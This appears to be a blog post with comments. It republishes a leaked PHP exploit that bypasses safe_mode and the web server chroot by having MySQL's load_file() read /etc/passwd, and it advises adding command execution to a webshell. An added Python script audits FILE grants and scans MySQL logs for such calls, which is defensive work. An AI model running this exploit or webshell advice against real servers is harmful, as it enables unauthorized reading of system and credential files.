Someone at kecoak elektronik just lost his private 0day: the technique for bypassing PHP safe_mode and the Apache chroot using MySQL has been leaked and published on a public disclosure site. There is no reason to keep it private anymore, so he has released the PoC to the public:
——————- Cut here ————————
<?php
/*
It has been a while since I made this exploit for my private collection.
I use this exploit to bypass:
- Safe_mode PHP, all versions
- The default Apache install on OpenBSD 3.x (dunno exactly), which is chrooted in /var/www/
Tested:
Ubuntu 6.06 - Fedora Core 5 - OpenBSD 3.9
By : Someone [at] k-elektronik
*/
echo "safe_mode = " . ini_get('safe_mode') . "\n";
// safe_mode and the web server chroot confine the PHP process only; mysqld runs
// outside both, so an account with the FILE privilege can have it read the file.
$conn = mysql_connect("localhost", "root", "rahasia");
$result = mysql_query("select load_file('/etc/passwd') as password");
while ($row = mysql_fetch_object($result))
    echo $row->password;
?>
——————- Cut here ————————
Just play around with the do_system() function to get system commands executed. Take vi and put those functions in your webshell.
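What makes the PoC above work is not a PHP bug but a privilege boundary: safe_mode and the Apache chroot confine the PHP process, while mysqld runs outside both and will read or write files for any account that holds the global FILE privilege. The following Python script is an added example, not code from the original post or its author; it shows the two checks a defender can run against that boundary: an audit of FILE grants and the secure_file_priv setting, and a sweep of MySQL general-log lines for LOAD_FILE, INTO OUTFILE/DUMPFILE and LOAD DATA INFILE. The log lines and privilege rows are constructed sample data; in practice they would come from the general log file and from `SELECT user, host, File_priv FROM mysql.user` and `SELECT @@secure_file_priv`.

```python
"""Defender-side checks for the MySQL FILE-privilege bypass shown above.

PHP safe_mode and the web server's chroot confine the PHP process, not
mysqld: a MySQL account holding the global FILE privilege can have the
server read files with LOAD_FILE() or write them with SELECT ... INTO
OUTFILE.  Two offline checks follow:

  1. audit_file_privilege(): flag accounts with FILE and a permissive
     secure_file_priv, from rows of  SELECT user, host, File_priv FROM mysql.user
     and the value of  SELECT @@secure_file_priv;
  2. scan_general_log(): find file-function calls in MySQL general-log lines.

All sample data in this file is constructed for the example.
"""
import re

# SQL comments are removed and whitespace collapsed before matching, so
# "LOAD_FILE/**/(...)" is seen as "LOAD_FILE (...)".  String literals are
# not parsed, which is good enough for a first-pass log sweep.
_COMMENT_RE = re.compile(r"/\*.*?\*/|--[^\n]*|#[^\n]*", re.S)
_FILE_FUNC_RE = re.compile(
    r"\bload_file\s*\(|\binto\s+(?:outfile|dumpfile)\b|\bload\s+data\s+(?:local\s+)?infile\b",
    re.I,
)
# General log entry (MySQL 5.7+): "<timestamp>\t<thread id> <command>\t<argument>"
_GENLOG_RE = re.compile(r"^(\S+)\s+(\d+)\s+(\w+)\s+(.*)$")


def normalize_sql(sql):
    """Remove SQL comments and collapse whitespace."""
    return " ".join(_COMMENT_RE.sub(" ", sql).split())


def scan_general_log(lines):
    """Return (thread_id, normalized_sql) for every Query entry that uses a file function."""
    hits = []
    for line in lines:
        m = _GENLOG_RE.match(line.rstrip("\r\n"))
        if m is None or m.group(3) != "Query":
            continue  # Connect, Quit, Init DB, ... carry no SQL
        sql = normalize_sql(m.group(4))
        if _FILE_FUNC_RE.search(sql):
            hits.append((int(m.group(2)), sql))
    return hits


def audit_file_privilege(user_rows, secure_file_priv):
    """user_rows: iterable of (user, host, File_priv) from mysql.user.
    secure_file_priv: the server variable; None stands for SQL NULL.
    Returns a list of findings (empty when nothing is flagged)."""
    findings = []
    for user, host, file_priv in user_rows:
        if file_priv.upper() == "Y":
            # Remediation for an application account: REVOKE FILE ON *.* FROM 'user'@'host';
            findings.append("'%s'@'%s' holds the global FILE privilege" % (user, host))
    if secure_file_priv == "":
        # Empty means unrestricted; a directory limits file functions to that
        # path; NULL disables them.  The variable is read-only at runtime, so
        # it is set in my.cnf:  [mysqld] secure_file_priv=/var/lib/mysql-files
        findings.append("secure_file_priv is empty: LOAD_FILE/OUTFILE may use any path mysqld can access")
    return findings


# Constructed sample data (not from the original post).
SAMPLE_GENERAL_LOG = """\
2023-05-01T09:12:44.118201Z\t   12 Connect\twebapp@localhost on shop using Socket
2023-05-01T09:12:44.118912Z\t   12 Query\tSELECT id, name FROM products WHERE id = 7
2023-05-01T09:13:02.440023Z\t   12 Query\tselect load_file('/etc/passwd') as password
2023-05-01T09:13:19.002711Z\t   12 Query\tSELECT 'x' INTO OUTFILE '/tmp/out.txt'
2023-05-01T09:13:40.771000Z\t   13 Query\tselect LOAD_FILE/**/('/etc/hostname')
2023-05-01T09:14:01.000001Z\t   12 Quit\t
""".splitlines()

SAMPLE_USER_ROWS = [
    ("root", "localhost", "Y"),
    ("webapp", "localhost", "Y"),   # the grant the PoC depends on
    ("readonly", "%", "N"),
]

if __name__ == "__main__":
    for thread_id, sql in scan_general_log(SAMPLE_GENERAL_LOG):
        print("thread %d: %s" % (thread_id, sql))
    for finding in audit_file_privilege(SAMPLE_USER_ROWS, ""):
        print("finding:", finding)
```

The audit deliberately lists every account with FILE, including root, because the decision of who legitimately needs it belongs to the DBA; the application account is the one that should never appear. The log scan normalizes comments before matching so that the `LOAD_FILE/**/(` spelling is caught along with the plain one.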
$conn = mysql_connect("localhost", "root", "rahasia");
Actually it doesn't even have to be root, as long as the account has been granted FILE privileges, and there are quite a lot of those; maybe that's my addition ^^
Regards,
Parse error: parse error, expecting `','' or `';'' in /usr/local/psa/home/vhosts/xxxxx/httpdocs/admin/pwn.php on line 2
why?
hihihi, that was the gist of my comment, mbah, even though it wasn't complete; turns out mbah got it 🙂
but there's another trick that was published quite a while ago, mbah 🙂
try checking the archives from 2 or 3 years ago 🙂
He he, there really are lots of safe_mode bypass tricks...
If it was published long ago, then the patch should have appeared too,
unless the admin is careless and doesn't patch; unless a vulnerability is kept private, the other bypass tricks that were published long ago are not just "there" but "very many".
The point isn't "whether you can bypass it or not" but "the trick used to bypass it"; there are clearly many tricks, it's just which ones already have a patch and which don't, right? That's what 0day means.